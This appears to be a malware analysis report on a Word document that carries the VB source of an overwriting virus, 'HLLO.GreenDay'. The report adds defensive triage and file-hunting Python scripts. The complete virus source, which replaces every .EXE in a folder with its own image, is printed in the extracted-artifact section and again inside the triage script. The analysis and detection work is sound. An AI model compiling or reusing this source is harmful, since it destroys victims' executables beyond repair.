Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f779ec07c705add7…

MALICIOUS

Office (OLE)

Size: 26.5 KB
Created: 2000-12-30 18:36:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 77c0396241d9eb36db54926a749fb761
SHA-1: e34f03530d05d9c194f372a7dcd3cb20aba76163
SHA-256: f779ec07c705add757bd347c270c259722dbc88f2eea954b18c45601ed056a8a
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is a Microsoft Word document (Word 9.0, i.e. Word 2000) whose VBA project contains an empty ThisDocument module and one standard module, 'Modul1'. Modul1 holds the source of a small high-level-language overwriting virus that names itself in its comments as 'HLLO.GreenDay by e[ax]' (HLLO is the AV naming prefix for High Level Language Overwriters). The subroutine 'trazi' ("search") reads the first velicina = 24576 bytes of the running program's own image, App.Path & "\" & App.EXEName & ".exe", into the byte array erej (ReDim erej(velicina) is zero-based, so the buffer actually holds 24577 bytes), then walks every *.EXE in the same directory with Dir() and overwrites each one (zrtva, "victim") in Binary mode with that buffer followed by the 2-byte Integer velicina. The originals are destroyed rather than infected in place, which is what makes this an overwriter. On Error Resume Next in Form_Load hides any failure. The ClamAV detection Doc.Trojan.Green-2 is consistent with this content.

Two caveats belong in the record. First, App.Path, App.EXEName and the Form_Load event exist in compiled Visual Basic 6 applications, not in Word VBA; the project defines no AutoOpen or Document_Open procedure and Word never fires Form_Load, so as carved this code does not execute when the document is opened. The document is better described as a carrier of the overwriter's source (presumably imported from a VB6 project; this is an inference from the code, not something the metadata states) than as a working Word infector, and the practical risk is that the source is compiled and run as a VB6 executable. Second, the code opens files as #Free (the FreeFile result) but reads and writes through #1; the two coincide only when no other file handle is open, another sign of hobbyist-quality code. The remaining non-English comments are greetings: 'Pozdravljam cijeli BiHNet.ORG' is "Greetings to all of BiHNet.ORG", and 'Pain: 10x for help' is "Pain: thanks for help".
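The paragraph above reasons from a handful of source-level features: Binary-mode file I/O, a Dir("*.EXE") loop, raw Put writes, error suppression, and the absence of any Word auto-execute entry point alongside VB6-only identifiers. The script below, added here as an example and not part of the original report, of oletools or of the sample, turns that reasoning into a small triage rule set over decoded macro text. The carved Modul1 source is embedded so it runs offline; the BENIGN macro is a constructed comparison case, and the rule names, the triage() function and its output keys are this example's own.

```python
"""Triage rules for a carved VBA/VB6 macro source (added example)."""
import re

# Procedures Word runs automatically on document events.  Form_Load is a
# VB6 form event and is deliberately not listed: Word never fires it.
WORD_AUTOEXEC = (
    "AutoOpen", "AutoExec", "AutoNew", "AutoClose",
    "Document_Open", "Document_New", "Document_Close",
)

# Identifiers that exist in a compiled VB6 application but not in Word VBA.
VB6_ONLY = ("App.Path", "App.EXEName", "Form_Load")

RULES = {
    "binary_read":       re.compile(r"^\s*Open\b.+\bFor Binary Access Read\b", re.I | re.M),
    "binary_write":      re.compile(r"^\s*Open\b.+\bFor Binary Access Write\b", re.I | re.M),
    "exe_enumeration":   re.compile(r"\bDir\s*\(.*\*\.EXE", re.I),
    "raw_put":           re.compile(r"^\s*Put\s+#", re.I | re.M),
    "error_suppression": re.compile(r"\bOn Error Resume Next\b", re.I),
}


def triage(vba: str) -> dict:
    """Return which rules fire on the macro text and what they imply."""
    hits = {name: bool(rx.search(vba)) for name, rx in RULES.items()}
    autoexec = [p for p in WORD_AUTOEXEC
                if re.search(r"\bSub\s+" + p + r"\b", vba, re.I)]
    vb6_refs = [t for t in VB6_ONLY if t.lower() in vba.lower()]
    # Read own image + enumerate *.EXE + raw Binary write into each = overwriter.
    overwriter = all(hits[k] for k in
                     ("binary_read", "binary_write", "exe_enumeration", "raw_put"))
    return {
        "hits": hits,
        "overwriter_pattern": overwriter,
        "word_autoexec": autoexec,
        "vb6_only_refs": vb6_refs,
        # Word executes macro code on open only through one of its own entry points.
        "runs_on_open": bool(autoexec),
    }


# The Modul1 source carved from the sample (copied from the report's artifact).
SAMPLE = r"""Attribute VB_Name = "Modul1"
Option Explicit
 Dim erej() As Byte
 Dim zrtva As String
 Const velicina As Integer = 24576
 Private Sub Form_Load()
 On Error Resume Next
 trazi
 End Sub
 Sub trazi()
 Dim Free
 Free = FreeFile
 Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
 ReDim erej(velicina)
 Get #1, 1, erej
 Close #Free
 zrtva = Dir(App.Path & "\" & "*.EXE")
 While zrtva <> ""
 Open App.Path & "\" & zrtva For Binary Access Write As #Free
 Put #1, , erej
 Put #1, , velicina
 Close #Free
 zrtva = Dir()
 Wend
 End Sub
"""

# Constructed comparison: a harmless macro that Word *does* run on open.
BENIGN = """Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
 MsgBox "Opened"
End Sub
"""

if __name__ == "__main__":
    for label, text in (("carved Modul1", SAMPLE), ("constructed benign", BENIGN)):
        print(label, triage(text))
```

Run on the carved module the overwriter pattern fires, no Word entry point is found and all three VB6-only identifiers are present, which is the combination the analysis describes; on the constructed benign macro only the entry-point check fires.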

Heuristics (2)

  • ClamAV: Doc.Trojan.Green-2 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Green-2
  • VBA macros detected (medium, OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  975 bytes
SHA-256: 185c62be9080b0f820d6aaf19dfcc88395e24d566aac71b72f7a2c5fb0cd0b55
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
Option Explicit
 Dim erej() As Byte
 Dim zrtva As String
 Const velicina As Integer = 24576
 Private Sub Form_Load()
 On Error Resume Next
 trazi
 End Sub
 Sub trazi()
 Dim Free
 Free = FreeFile
 Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
 ReDim erej(velicina)
 Get #1, 1, erej
 Close #Free
 zrtva = Dir(App.Path & "\" & "*.EXE")
 While zrtva <> ""
 Open App.Path & "\" & zrtva For Binary Access Write As #Free
 Put #1, , erej
 Put #1, , velicina
 Close #Free
 zrtva = Dir()
 Wend
 'HLLO.GreenDay by e[ax]
 'Greetz to all ppl on #virus
 'Pozdravljam cijeli BiHNet.ORG
 'Pain: 10x for help
 End Sub
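The 'trazi' loop above yields two host-side indicators for incident response, worked through in the script below. It is an added example, not part of the original report or of the sample: because every *.EXE the loop touches receives the same bytes, infected executables in a directory become byte-identical and cluster by content hash; and because the final Put appends the Integer velicina, each victim ends with the 2-byte little-endian value 24576 (bytes 00 60). The directory is built in a temporary folder with a placeholder image, not the sample's real executable, so the script runs offline; hunt(), build_demo_dir() and run_demo() are names chosen for this example.

```python
"""Hunt for executables overwritten by an HLLO-style virus (added example)."""
import hashlib
import struct
import tempfile
from collections import defaultdict
from pathlib import Path

VELICINA = 24576                             # Const velicina in the macro
TAIL_MARKER = struct.pack("<h", VELICINA)    # b"\x00\x60": the trailing Integer


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hunt(directory: Path, pattern: str = "*.exe") -> dict:
    """Group executables by content hash and flag the overwriter's tail marker.

    The macro matches *.EXE on a case-insensitive Windows filesystem; on a
    case-sensitive system pass the pattern that fits the evidence image.
    """
    by_hash = defaultdict(list)
    tail_hits = []
    for p in sorted(directory.glob(pattern)):
        if not p.is_file():
            continue
        by_hash[sha256_file(p)].append(p.name)
        with p.open("rb") as f:
            f.seek(max(0, p.stat().st_size - 2))
            if f.read(2) == TAIL_MARKER:
                tail_hits.append(p.name)
    # Two or more byte-identical executables in one directory is the overwriter's footprint.
    clusters = {h: names for h, names in by_hash.items() if len(names) > 1}
    return {"identical_clusters": clusters, "tail_marker": tail_hits}


def build_demo_dir(root: Path) -> None:
    """Constructed scenario: three victims overwritten with one image, one clean file."""
    image = (b"MZ" + bytes(range(256)) * 96)[:VELICINA + 1]  # placeholder, not real code;
    victim = image + TAIL_MARKER                              # erej is 24577 bytes (zero-based)
    for name in ("setup.exe", "game.exe", "tool.exe"):
        (root / name).write_bytes(victim)
    (root / "clean.exe").write_bytes(b"MZ" + b"\x90" * 4096)  # distinct, no marker


def run_demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_demo_dir(root)
        return hunt(root)


if __name__ == "__main__":
    print(run_demo())
```

Against a real evidence image, run hunt() over each directory that held a copy of the compiled virus; a cluster of identical executables, all carrying the tail marker, is the set of files that must be restored from backup, since the overwriter leaves nothing of the originals to repair.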